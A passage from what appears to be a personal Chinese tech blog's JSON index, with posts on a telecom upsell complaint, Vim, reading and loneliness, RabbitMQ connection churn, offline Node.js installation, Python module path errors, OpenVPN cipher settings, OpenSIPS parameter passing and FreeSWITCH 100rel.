","permalink":"https://wdd.js.org/posts/2021/05/ae2rme/","summary":"联通官方客服已经开始割韭菜了。\n前两天10010给我打电话,一个女客服操着浓重的口音,兴奋的给说我是优质客户,然后因为回馈老用户的关系,每个月会多送我2个G的5G高速流量。\n我当时很警觉,立马问她这个会对我原来的套餐有影响吗,她说没任何影响,接着殷切的问我要不要办理。我思考了一下,觉得不用花钱,又多了2个G的流量,索性就办理了。\n今天我在联通掌上营业厅上查自己的实时话费,突然多出了一项9元的流量叠加包月套餐费。的确对我原来的套餐没有影响,只是多了一个新的业务。😂\n我思来想去,我应该没有办理这个套餐啊?哪里冒出来的。然后仔细的从迷宫似的掌上营业厅上查找套餐信息。结果给我找到了下面的信息。\n我当时很生气,当时客服给我介绍流量包的时候,从始至终没有提这个流量包要收费的事情。我也是大意了,没有闪。\n接着我就打了10010的官方客服,然后走人工投诉,最终取消了这个套餐。\n我想,这种电话应该很多人都接过吧,被骗的应该不只是少数,如果不仔细看自己的账单,我也不知道有这件事情。\n从这件事事情我也反省自己:\n官方客服也不要信 客服说的话,都要当作放屁 没有看到黑纸白字的承诺,都是骗人的 不要想贪小便宜,否则自己就会被当作韭菜 ","title":"官方客服也开始割韭菜"},{"content":"我只使用VIM作为主力开发工具,已经快到200天了。聊聊这其中的一些感受。\n对大部分来说,提到文本编辑器,我们可能会想到word, nodepad++, webstorm, sublime, vscode。\n这些GUI工具在给我们提供便利性的同时,也在逐渐固化我们对于编辑器的认知与思维方式。\n闭上眼睛,提到编辑器,你脑海里想到的界面是什么呢?\n左边一个文件浏览窗口 右边一个多标签页的文件编辑窗口 陌生感 想象一下,我们在使用编辑器的时候,哪些动作做的最多\n鼠标移动到文件浏览窗口,通过滚轮的滚动,来选择文件,单击之后,打开一个文件。但是在VIM上,完全没有这种操作。 GUI下可以同时打开多个文件,进行编辑。但是很多人觉得VIM只能打开一个文件,甚至想打开另一个文件的时候,先要退出VIM。即使打开了多个文件,也不知道这些文件要如何切换。 但是当你刚开始使用VIM的时候,可能并没有安装什么插件,这时候你会有以下的一些困惑\n你用VIM打开一个文件后,怎么再打开一个文件呢?因为默认的VIM是没有文件浏览窗口的。你在GUI模式下养成的经验,在VIM上完全无法使用。你可能甚至不知道要怎么退出VIM。所有的一切都那么陌生。\n虚无感 
VIM一般都运行在终端之上,给人感觉云里雾里,虚无缥缈。而编辑器就不同了,你看到的文件夹,打开的文件,对你来说就像是身上穿的衣服,手里搬的砖。终端呢,黑乎乎的,没啥颜色与图标,看起来那么不切实际,仿佛是天边的云彩,千变万化,无法捉摸。\n恐惧感 很多人可能做过那种梦,就是在梦里感觉自己在自由落体,然后惊醒。在你使用VIM的时候,可能也会有这种感觉。例如,一个文件我写了几百行了,万一ssh远程连接断了,或者说终端崩溃了,我写的文件会不会丢呢?为了安全起见,还是不用VIM吧。\n挫折感 使用VIM的时候,你必然要经历很多困难,这些困难让你感觉到挫折,失去了继续学习的欲望。内心的另外一个人可能会说,我只想安安静静地做一个写代码的美男子,为什么要折腾这毫无颜值、难用的VIM呢?\n","permalink":"https://wdd.js.org/vim/why-you-leave-vim/","summary":"我只使用VIM作为主力开发工具,已经快到200天了。聊聊这其中的一些感受。\n对大部分来说,提到文本编辑器,我们可能会想到word, nodepad++, webstorm, sublime, vscode。\n这些GUI工具在给我们提供便利性的同时,也在逐渐固化我们对于编辑器的认知与思维方式。\n闭上眼睛,提到编辑器,你脑海里想到的界面是什么呢?\n左边一个文件浏览窗口 右边一个多标签页的文件编辑窗口 陌生感 想象一下,我们在使用编辑器的时候,哪些动作做的最多\n鼠标移动到文件浏览窗口,通过滚轮的滚动,来选择文件,单击之后,打开一个文件。但是在VIM上,完全没有这种操作。 GUI下可以同时打开多个文件,进行编辑。但是很多人觉得VIM只能打开一个文件,甚至想打开另一个文件的时候,先要退出VIM。即使打开了多个文件,也不知道这些文件要如何切换。 但是当你刚开始使用VIM的时候,可能并没有安装什么插件,这时候你会有以下的一些困惑\n你用VIM打开一个文件后,怎么再打开一个文件呢?因为默认的VIM是没有文件浏览窗口的。你在GUI模式下养成的经验,在VIM上完全无法使用。你可能甚至不知道要怎么退出VIM。所有的一切都那么陌生。\n虚无感 VIM一般都运行在终端之上,给人感觉云里雾里,虚无缥缈。而编辑器就不同了,你看到的文件夹,打开的文件,对你来说就像是身上穿的衣服,手里搬的砖。终端呢,黑乎乎的,没啥颜色与图标,看起来那么不切实际,仿佛是天边的云彩,千变万化,无法捉摸。\n恐惧感 很多人可能做过那种梦,就是在梦里感觉自己在自由落体,然后惊醒。在你使用VIM的时候,可能也会有这种感觉。例如,一个文件我写了几百行了,万一ssh远程连接断了,或者说终端崩溃了,我写的文件会不会丢呢?为了安全起见,还是不用VIM吧。\n挫折感 使用VIM的时候,你必然要经历很多困难,这些困难让你感觉到挫折,失去了继续学习的欲望。内心的另外一个人可能会说,我只想安安静静地做一个写代码的美男子,为什么要折腾这毫无颜值、难用的VIM呢?","title":"让你放弃VIM的一些原因"},{"content":"初中的时候,我曾经读过鲁滨逊漂流记,那时候这本书中最吸引我的是各种新奇的冒险体验,鲁滨逊接下来会遇到什么事情,是我最关注的事情。\n最近,我又开始读这本书了。是因为我感觉到很孤独,我不知道如何解决。我想,鲁滨逊一个人在一个荒岛上过了二十八年,他是如何面对孤独的呢?我想找到这个答案。\n写日记 小说中有不少的章节,都是鲁滨逊的日记。记录了他每天的工作和经历,通过写日志,他仿佛能够与自己对话。所以,有时候当我感到孤独的时候,我也写日记,把我的感想,我的困惑和烦恼统统写出来。对我自己来说,这也是一种释放。\n投身工作,制造产品,让自己忙活 除非生病或者下雨,鲁滨逊总是在不停的忙活着。\n收集葡萄,晒葡萄干 圈养小羊,让自己有充足的肉可以吃 种植大麦,自己制作面包 加固自己的房子 晒制陶土,制作陶器 环岛旅行 \u0026hellip; 鲁滨逊每天都在忙活着,每一天过得都非常有意义。我也觉得自己决不能浪费时间。\n找到自己的信仰 
鲁滨逊在一次生病过程中,身体非常虚弱,当他回忆往事的时候,总觉得自己是个罪恶的人,无法得到谅解。但是偶然他得到一本《圣经》,他阅读圣经,从中找到自己的信仰。有信仰是非常幸福的事情,但是你若问我我的信仰是什么,我也不知道我的信仰是什么。\n这是最好的时代,也是最坏的时代。所有的人都觉得90后是压力最大的一代,90后的神经也是最敏感的(腾讯张军的致敬青年,白岩松的“不会吧”)。我们承受着各种压力,其中最大的可能就是房价了。\n人生当中,自由自在可能仅仅是片刻的,承受压力却是主旋律。但是如何面对压力,却把人分成了不同的样子。有的人会被压力击垮,放弃抵抗,沉醉于各种网络精神鸦片中,有的人却能负重前行,坚持学习,一往无前。\n罗曼罗兰说过:这世上只有一种真正的英雄主义,就是认清生活的真相,并且仍然热爱她。\n","permalink":"https://wdd.js.org/posts/2021/05/vzfo04/","summary":"初中的时候,我曾经读过鲁滨逊漂流记,那时候这本书中最吸引我的是各种新奇的冒险体验,鲁滨逊接下来会遇到什么事情,是我最关注的事情。\n最近,我又开始读这本书了。是因为我感觉到很孤独,我不知道如何解决。我想,鲁滨逊一个人在一个荒岛上过了二十八年,他是如何面对孤独的呢?我想找到这个答案。\n写日记 小说中有不少的章节,都是鲁滨逊的日记。记录了他每天的工作和经历,通过写日志,他仿佛能够与自己对话。所以,有时候当我感到孤独的时候,我也写日记,把我的感想,我的困惑和烦恼统统写出来。对我自己来说,这也是一种释放。\n投身工作,制造产品,让自己忙活 除非生病或者下雨,鲁滨逊总是在不停的忙活着。\n收集葡萄,晒葡萄干 圈养小羊,让自己有充足的肉可以吃 种植大麦,自己制作面包 加固自己的房子 晒制陶土,制作陶器 环岛旅行 \u0026hellip; 鲁滨逊每天都在忙活着,每一天过得都非常有意义。我也觉得自己决不能浪费时间。\n找到自己的信仰 鲁滨逊在一次生病过程中,身体非常虚弱,当他回忆往事的时候,总觉得自己是个罪恶的人,无法得到谅解。但是偶然他得到一本《圣经》,他阅读圣经,从中找到自己的信仰。有信仰是非常幸福的事情,但是你若问我我的信仰是什么,我也不知道我的信仰是什么。\n这是最好的时代,也是最坏的时代。所有的人都觉得90后是压力最大的一代,90后的神经也是最敏感的(腾讯张军的致敬青年,白岩松的“不会吧”)。我们承受着各种压力,其中最大的可能就是房价了。\n人生当中,自由自在可能仅仅是片刻的,承受压力却是主旋律。但是如何面对压力,却把人分成了不同的样子。有的人会被压力击垮,放弃抵抗,沉醉于各种网络精神鸦片中,有的人却能负重前行,坚持学习,一往无前。\n罗曼罗兰说过:这世上只有一种真正的英雄主义,就是认清生活的真相,并且仍然热爱她。","title":"再读鲁滨逊漂流记: 成年人如何面对孤独"},{"content":"魔女宅急便 琪琪 有点像花木兰 佐助 不认识 小樱 不认识 不认识 不认识 参考 https://designyoutrust.com/2021/04/person-uses-artificial-intelligence-to-make-anime-and-cartoon-characters-look-more-realistic/ ","permalink":"https://wdd.js.org/posts/2021/05/mfh46t/","summary":"魔女宅急便 琪琪 有点像花木兰 佐助 不认识 小樱 不认识 不认识 不认识 参考 https://designyoutrust.com/2021/04/person-uses-artificial-intelligence-to-make-anime-and-cartoon-characters-look-more-realistic/ ","title":"使用AI让卡通人物更加真实"},{"content":"连接抖动介绍 Workloads with high connection churn (a high rate of connections being opened and closed) will require TCP setting tuning to avoid exhaustion of certain resources: max number of file handles, Erlang processes on RabbitMQ nodes, kernel\u0026#39;s ephemeral port range (for hosts that open a lot of connections, 
including Federation links and Shovel connections), and others. Nodes that are exhausted of those resources won\u0026rsquo;t be able to accept new connections, which will negatively affect overall system availability.\n连接抖动,就是在单位时间内,有大量的连接产生,也同时有大量的连接关闭。这些抖动将会耗费大量的资源。\n从RabbitMq 3.7.9开始,引入了对抖动数据的统计。在mq管理界面上,可以看到下面的图标。\n下面是随时间变化,mq连接数的抖动情况。\nWhile connection and disconnection rates are system-specific, rates consistently above 100/second likely indicate a suboptimal connection management approach by one or more applications and usually are worth investigating.\n如果抖动的指标持续的超过每秒100个,这就需要引起注意了,需要调查下具体的抖动原因。\n抖动统计 抖动统计包括三个方面\nConnection Channel Queue 参考 https://www.rabbitmq.com/connections.html#high-connection-churn https://www.rabbitmq.com/networking.html#dealing-with-high-connection-churn https://vincent.bernat.ch/en/blog/2014-tcp-time-wait-state-linux https://www.rabbitmq.com/troubleshooting-networking.html#detecting-high-connection-churn ","permalink":"https://wdd.js.org/posts/2021/05/nr1shd/","summary":"连接抖动介绍 Workloads with high connection churn (a high rate of connections being opened and closed) will require TCP setting tuning to avoid exhaustion of certain resources: max number of file handles, Erlang processes on RabbitMQ nodes, kernel\u0026rsquo;s ephemeral port range (for hosts that open a lot of connections, including Federation links and Shovel connections), and others. Nodes that are exhausted of those resources won\u0026rsquo;t be able to accept new connections, which will negatively affect overall system availability.","title":"RabbitMq 大量的连接抖动"},{"content":"1. 选择安装包 访问 https://nodejs.org/en/download/ 选择Linux Binaries(x64) 2. 
解压 下载后的文件是一个tar.xz的文件。\nxz -d node-xxxx.tar.zx // 解压xz tar -xvf node-xxxx.tar // 拿出文件夹 解压后的目录如下,其中\n➜ node-v14.17.0-linux-x64 ll total 600K drwxr-xr-x 2 wangdd staff 4.0K May 13 09:34 bin -rw-r--r-- 1 wangdd staff 469K May 12 02:14 CHANGELOG.md drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 include drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 lib -rw-r--r-- 1 wangdd staff 79K May 12 02:14 LICENSE -rw-r--r-- 1 wangdd staff 30K May 12 02:14 README.md drwxr-xr-x 5 wangdd staff 4.0K May 12 02:14 share // bin目录下就是nodejs的可执行程序 ➜ node-v14.17.0-linux-x64 ll bin total 71M -rwxr-xr-x 1 wangdd staff 71M May 12 02:14 node lrwxrwxrwx 1 wangdd staff 38 May 12 02:14 npm -\u0026gt; ../lib/node_modules/npm/bin/npm-cli.js lrwxrwxrwx 1 wangdd staff 38 May 12 02:14 npx -\u0026gt; ../lib/node_modules/npm/bin/npx-cli.js ➜ node-v14.17.0-linux-x64 ./bin/node --version v14.17.0 通过将bin目录加入到$PATH环境变量中这种方式,就可以直接调用node。\n","permalink":"https://wdd.js.org/fe/install-nodejs-offline/","summary":"1. 选择安装包 访问 https://nodejs.org/en/download/ 选择Linux Binaries(x64) 2. 
解压 下载后的文件是一个tar.xz的文件。\nxz -d node-xxxx.tar.zx // 解压xz tar -xvf node-xxxx.tar // 拿出文件夹 解压后的目录如下,其中\n➜ node-v14.17.0-linux-x64 ll total 600K drwxr-xr-x 2 wangdd staff 4.0K May 13 09:34 bin -rw-r--r-- 1 wangdd staff 469K May 12 02:14 CHANGELOG.md drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 include drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 lib -rw-r--r-- 1 wangdd staff 79K May 12 02:14 LICENSE -rw-r--r-- 1 wangdd staff 30K May 12 02:14 README.","title":"离线安装nodejs"},{"content":"【我只会心疼哥哥(原视频)-哔哩哔哩】https://b23.tv/9YIMtp\n蓝天白云,晴空万里。路旁的电线杆笔挺的站着,有几只小鸟,在电线上蹦来蹦去,叫着闹着,空气中充满了令人愉快的感觉。\n一辆白色雅迪冠能T5石墨烯72电池增程矩阵式大灯轻便型电动车自北向南,疾驰而过。\n车上坐着一男一女。少女扎着马尾辫,手中举着一根折叠式棒棒糖,笑靥如画,喃喃道:“哥哥,哥哥,你给我买这个,你女朋友知道了,不会生气吧?” 不等男生回答,她自顾自的先尝了一口。然后把棒棒糖举到男生嘴边,然后嘻嘻笑道:“真好吃,哥,你也尝一口”\n没有一个人瞧见这男生是怎么舔到棒棒糖的,但他的确尝了一口。\n少女睁大眼睛,张开嘴巴,惊讶的瞪着棒棒糖,又生气又害羞,仿佛怪自己不该那么鲁莽。她皎白的面颊已泛起了红晕,在阳光下,仿佛是一朵刚开的海棠, 娇嗔道:“哥哥,你女朋友要是知道我俩吃同一个棒棒糖,你女朋友不会吃醋吧?”\n“哥哥,你骑着小电动车,还带着我,你女朋友要是知道了,不会打我吧”\n“好可怕!你女朋友!”\n少女用眼角瞟着男生,黯然道:“你女朋友不像我,我只会心疼哥哥。”\n","permalink":"https://wdd.js.org/posts/2021/05/rhan2i/","summary":"【我只会心疼哥哥(原视频)-哔哩哔哩】https://b23.tv/9YIMtp\n蓝天白云,晴空万里。路旁的电线杆笔挺的站着,有几只小鸟,在电线上蹦来蹦去,叫着闹着,空气中充满了令人愉快的感觉。\n一辆白色雅迪冠能T5石墨烯72电池增程矩阵式大灯轻便型电动车自北向南,疾驰而过。\n车上坐着一男一女。少女扎着马尾辫,手中举着一根折叠式棒棒糖,笑靥如画,喃喃道:“哥哥,哥哥,你给我买这个,你女朋友知道了,不会生气吧?” 不等男生回答,她自顾自的先尝了一口。然后把棒棒糖举到男生嘴边,然后嘻嘻笑道:“真好吃,哥,你也尝一口”\n没有一个人瞧见这男生是怎么舔到棒棒糖的,但他的确尝了一口。\n少女睁大眼睛,张开嘴巴,惊讶的瞪着棒棒糖,又生气又害羞,仿佛怪自己不该那么鲁莽。她皎白的面颊已泛起了红晕,在阳光下,仿佛是一朵刚开的海棠, 娇嗔道:“哥哥,你女朋友要是知道我俩吃同一个棒棒糖,你女朋友不会吃醋吧?”\n“哥哥,你骑着小电动车,还带着我,你女朋友要是知道了,不会打我吧”\n“好可怕!你女朋友!”\n少女用眼角瞟着男生,黯然道:“你女朋友不像我,我只会心疼哥哥。”","title":"用古龙的手法 写我只会心疼哥哥"},{"content":"python3 wave.py Traceback (most recent call last): File \u0026#34;wave.py\u0026#34;, line 3, in \u0026lt;module\u0026gt; import matplotlib.pyplot as plt ModuleNotFoundError: No module named \u0026#39;matplotlib\u0026#39; 这种问题一般有两个原因\n这个第三方的包本地的确没有安装,解决方式就是安装这个包 这个包安装了,但是因为环境配置或者其他问题,导致找不到正确的路径 问题1: 本地有没有安装过matplotlib? 
下面的命令的输出说明已经安装了matplotlib, 并且目录是\n/usr/local/lib/python3.9/site-packages pip3 show matplotlib Name: matplotlib Version: 3.4.1 Summary: Python plotting package Home-page: https://matplotlib.org Author: John D. Hunter, Michael Droettboom Author-email: matplotlib-users@python.org License: PSF Location: /usr/local/lib/python3.9/site-packages Requires: pillow, python-dateutil, pyparsing, numpy, kiwisolver, cycler Required-by: 问题2: python3运行的是哪个版本的python? 由于历史原因,python的版本非常多,电脑上可能安装了多个python的版本。\n下面的命令说明,python3实际执行的是python 3.8.2,搜索的路径也是3.8的。但是pip3安装的第三方包,是在python3.9的目录下。\n➜ bin python3 Python 3.8.2 (default, Dec 21 2020, 15:06:04) [Clang 12.0.0 (clang-1200.0.32.29)] on darwin Type \u0026#34;help\u0026#34;, \u0026#34;copyright\u0026#34;, \u0026#34;credits\u0026#34; or \u0026#34;license\u0026#34; for more information. \u0026gt;\u0026gt;\u0026gt; import sys \u0026gt;\u0026gt;\u0026gt; print(sys.path) [\u0026#39;\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python38.zip\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8/lib-dynload\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8/site-packages\u0026#39;] ➜ pip3 -V pip 21.0.1 from /usr/local/lib/python3.9/site-packages/pip (python 3.9) 问题3: python3.9在哪? 通过上面的命令,就说明了我的电脑上有python3.9, 那么实际的可执行文件在哪里呢?\n一般我是用brew安装软件的,brew list\nbrew list - python@3.9 brew info python@3.9 Python has been installed as /usr/local/bin/python3 Unversioned symlinks `python`, `python-config`, `pip` etc. 
pointing to `python3`, `python3-config`, `pip3` etc., respectively, have been installed into /usr/local/opt/python@3.9/libexec/bin 上面的输出中,有两个路径\n/usr/local/bin/python3 试了下这个路径没有文件 /usr/local/opt/python@3.9/libexec/bin 这个文件存在 ➜ bin /usr/local/opt/python@3.9/libexec/bin/python -V Python 3.9.2 将python3 设置为一个别名\nalias python3=\u0026#39;/usr/local/opt/python@3.9/libexec/bin/python\u0026#39; source ~/.zshrc\npython3 wave.py,\n问题解决。\n","permalink":"https://wdd.js.org/posts/2021/05/blzt8r/","summary":"python3 wave.py Traceback (most recent call last): File \u0026#34;wave.py\u0026#34;, line 3, in \u0026lt;module\u0026gt; import matplotlib.pyplot as plt ModuleNotFoundError: No module named \u0026#39;matplotlib\u0026#39; 这种问题一般有两个原因\n这个第三方的包本地的确没有安装,解决方式就是安装这个包 这个包安装了,但是因为环境配置或者其他问题,导致找不到正确的路径 问题1: 本地有没有安装过matplotlib? 下面的命令的输出说明已经安装了matplotlib, 并且目录是\n/usr/local/lib/python3.9/site-packages pip3 show matplotlib Name: matplotlib Version: 3.4.1 Summary: Python plotting package Home-page: https://matplotlib.org Author: John D. Hunter, Michael Droettboom Author-email: matplotlib-users@python.org License: PSF Location: /usr/local/lib/python3.9/site-packages Requires: pillow, python-dateutil, pyparsing, numpy, kiwisolver, cycler Required-by: 问题2: python3运行的那个版本的python? 
由于历史原因,python的版本非常多,电脑上可能安装了多个python的版本。\n下面的命令说明,python3实际执行的的是python 3.8.2,搜索的路径也是3.8的。但是pip3安装的第三方包,是在python3.9的目录下。\n➜ bin python3 Python 3.","title":"python ModuleNotFoundError"},{"content":" 人生是一场仅与时间为伴的孤独修行\nA《鲁宾逊漂流记》 B《一日看尽长安花》 C《被讨厌的勇气》 D《围城》 E《牛津通识读本 数学》 5.10 11 12 13 14 15 16 17 18 19 鲁滨逊漂流记 3 6 9 20 被讨厌的勇气 20 25 30 36 围城 6 10 11 13 牛津通识读本 数学 5 8 10 19 一日看尽长安花 15 20 24 35 ","permalink":"https://wdd.js.org/posts/2021/05/appxev/","summary":" 人生是一场仅与时间为伴的孤独修行\nA《鲁宾逊漂流记》 B《一日看尽长安花》 C《被讨厌的勇气》 D《围城》 E《牛津通识读本 数学》 5.10 11 12 13 14 15 16 17 18 19 鲁滨逊漂流记 3 6 9 20 被讨厌的勇气 20 25 30 36 围城 6 10 11 13 牛津通识读本 数学 5 8 10 19 一日看尽长安花 15 20 24 35 ","title":"5月书单"},{"content":"2021-01-19 12:01:58 OPTIONS ERROR: failed to negotiate cipher with server. Add the server\u0026#39;s cipher (\u0026#39;BF-CBC\u0026#39;) to --data-ciphers (currently \u0026#39;AES-256-GCM:AES-128-GCM\u0026#39;) if you want to connect to this server. 2021-01-19 12:01:58 ERROR: Failed to apply push options 2021-01-19 12:01:58 Failed to open tun/tap interface 解决办法:在配置文件中增加一行\nncp-ciphers \u0026#34;BF-CBC\u0026#34; PS: 今天是我的生日,QQ邮箱又是第一个发来祝福的 苦笑.jpg\n","permalink":"https://wdd.js.org/posts/2021/05/kakgg7/","summary":"2021-01-19 12:01:58 OPTIONS ERROR: failed to negotiate cipher with server. Add the server\u0026#39;s cipher (\u0026#39;BF-CBC\u0026#39;) to --data-ciphers (currently \u0026#39;AES-256-GCM:AES-128-GCM\u0026#39;) if you want to connect to this server. 
2021-01-19 12:01:58 ERROR: Failed to apply push options 2021-01-19 12:01:58 Failed to open tun/tap interface 解决办法:在配置文件中增加一行\nncp-ciphers \u0026#34;BF-CBC\u0026#34; PS: 今天是我的生日,QQ邮箱又是第一个发来祝福的 苦笑.jpg","title":"openvpn 报错"},{"content":"我小时候曾去过成都,那时候还没有高速公路,而是九曲回肠的盘山公路。路的一边是看不到底的悬崖,另一边是接近90度的峭壁。在峭壁之上,有很多巨石,摇摇欲坠,十分吓人。\n深夜时分,车灯蔓延处,连起来仿佛是一条天路。\n从成都回来的时候,我写下这个小诗,匆匆十年,桃花依旧,物是人非。曾经梦想中的那个遥远的未来,已然近在咫尺。然而这首小诗,却从未忘记。\n灯光随血液而流动心跳伴坎坷而起伏极目远眺想看见路的时候蓦然回首路的尽头心里头\n","permalink":"https://wdd.js.org/posts/2021/04/gbx6x5/","summary":"我小时候曾去过成都,那时候还没有高速公路,而是九曲回肠的盘山公路。路的一边是看不到底的悬崖,另一边是接近90度的峭壁。在峭壁之上,有很多巨石,摇摇欲坠,十分吓人。\n深夜时分,车灯蔓延处,连起来仿佛是一条天路。\n从成都回来的时候,我写下这个小诗,匆匆十年,桃花依旧,物是人非。曾经梦想中的那个遥远的未来,已然近在咫尺。然而这首小诗,却从未忘记。\n灯光随血液而流动心跳伴坎坷而起伏极目远眺想看见路的时候蓦然回首路的尽头心里头","title":"不曾忘的一首小诗"},{"content":"今天在写一个shell脚本的时候,遇到一个奇怪的报错,说我的脚本有语法错误。\nif [ $1 == $2 ]; then echo ok else echo not ok fi 编译器的报错是说if语句是有问题的,但是我核对了好几遍,也看了网上的例子,发现没什么毛病。\n我自己看了几分钟,还是看不出所以然来。然后我就找了一位同事帮我看看,首先我给他解释了一遍我的脚本是如何工作的,说着说着,他还在思考的时候,我突然发现,我知道原因了。\n这个shell脚本是我从另一个脚本里拷贝的。脚本的第一行是\n#!/bin/sh 原因就在于第一行的这条语句。\n一般情况下我们都是写的/bin/bash, 但是在拷贝的时候,我没有考虑到这个。实际在我的电脑上/bin/sh很可能不是bash, 而是zsh,zsh的语法和bash的语法是不一样的。所以会报语法错误\n#!/bin/bash 这就是典型的一叶障目,不见泰山。 我觉得我需要买个小黄鸭,在遇到难以解决的问题时,抽丝剥茧的解释给它听。\n经过这件事情后,我也想到了今天刚学到的一个概念。叫做费曼学习法,据说是很牛逼的学习法,可以非常快的学习一门知识。\n简单介绍一下费曼学习法:\n选择一个你要学习的概念,写在本子上 假装你要把这个概念教会别人 你一定会某些地方卡壳的,当你卡壳的时候,就立即回去看书 简化你的语言,目的是用你自己的语言,解释某个概念,如果你依然还是有些困惑,那说明你还是不够了解这个概念。 费曼曾获得诺贝尔奖,所以他不是个简单的人。费曼的老师叫惠勒,费曼的学习方法很可能受到惠勒的影响。\n惠勒常常说:人只有教别人的时候,才能学到更多。\nAnother favorite Wheelerism is \u0026ldquo;one can only learn by teaching. 惠勒主义\n惠勒还有一句名言:\n去恨就是学习,去学习是去理解,去理解是去欣赏,去欣赏则是去爱,也许你会爱上你的理论。,\nTo hate is to study, to study is to understand, to understand is to appreciate, to appreciate is to love. So maybe I\u0026rsquo;ll end up loving your theory.
\u0026ndash; Wheeler\n总之,我们如果在学习时能够把知识传授给别人,对自己来说也是一种学习。\n参考 https://www.zhihu.com/question/20576786 https://baike.baidu.com/item/%E8%B4%B9%E6%9B%BC%E5%AD%A6%E4%B9%A0%E6%B3%95/50895393 https://www.quora.com/Learning-New-Things/How-can-you-learn-faster/answer/Acaz-Pereira https://www.scientificamerican.com/article/pioneering-physicist-john-wheeler-dies/ ","permalink":"https://wdd.js.org/posts/2021/04/zl6rpy/","summary":"今天在写一个shell脚本的时候,遇到一个奇怪的报错,说我的脚本有语法错误。\nif [ $1 == $2 ]; then echo ok else echo not ok fi 编译器的报错是说if语句是有问题的,但是我核对了好几遍,也看了网上的例子,发现没什么毛病。\n我自己看了几分钟,还是看不出所以然来。然后我就找了一位同事帮我看看,首先我给他解释了一遍我的脚本是如何工作的,说着说着,他还在思考的时候,我突然发现,我知道原因了。\n这个shell脚本是我从另一个脚本里拷贝的。脚本的第一行是\n#!/bin/sh 原因就在于第一行的这条语句。\n一般情况下我们都是写的/bin/bash, 但是在拷贝的时候,我没有考虑到这个。实际在我的电脑上/bin/sh很可能不是bash, 而是zsh,zsh的语法和bash的语法是不一样的。所以会报语法错误\n#!/bin/bash 这就是典型的一叶障目,不见泰山。 我觉得我需要买个小黄鸭,在遇到难以解决的问题时,抽丝剥茧的解释给它听。\n经过这件事情后,我也想到了今天刚学到的一个概念。叫做费曼学习法,据说是很牛逼的学习法,可以非常快的学习一门知识。\n简单介绍一下费曼学习法:\n选择一个你要学习的概念,写在本子上 假装你要把这个概念教会别人 你一定会某些地方卡壳的,当你卡壳的时候,就立即回去看书 简化你的语言,目的是用你自己的语言,解释某个概念,如果你依然还是有些困惑,那说明你还是不够了解这个概念。 费曼曾获得诺贝尔奖,所以他不是个简单的人。费曼的老师叫惠勒,费曼的学习方法很可能受到惠勒的影响。\n惠勒常常说:人只有教别人的时候,才能学到更多。\nAnother favorite Wheelerism is \u0026ldquo;one can only learn by teaching. 惠勒主义\n惠勒还有一句名言:\n去恨就是学习,去学习是去理解,去理解是去欣赏,去欣赏则是去爱,也许你会爱上你的理论。,\nTo hate is to study, to study is to understand, to understand is to appreciate, to appreciate is to love. So maybe I\u0026rsquo;ll end up loving your theory.","title":"从/bin/sh到费曼学习法"},{"content":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? 
ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","permalink":"https://wdd.js.org/opensips/ch8/fork/","summary":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","title":"模块传参的重构"},{"content":" sbc_100rel.pdf\n在fs中配置:\nenable-100rel 设置为true ➜ fs-conf ack 100rel sip_profiles/internal.xml 112: There are known issues (asserts and segfaults) when 100rel is enabled. 113: It is not recommended to enable 100rel at this time. 
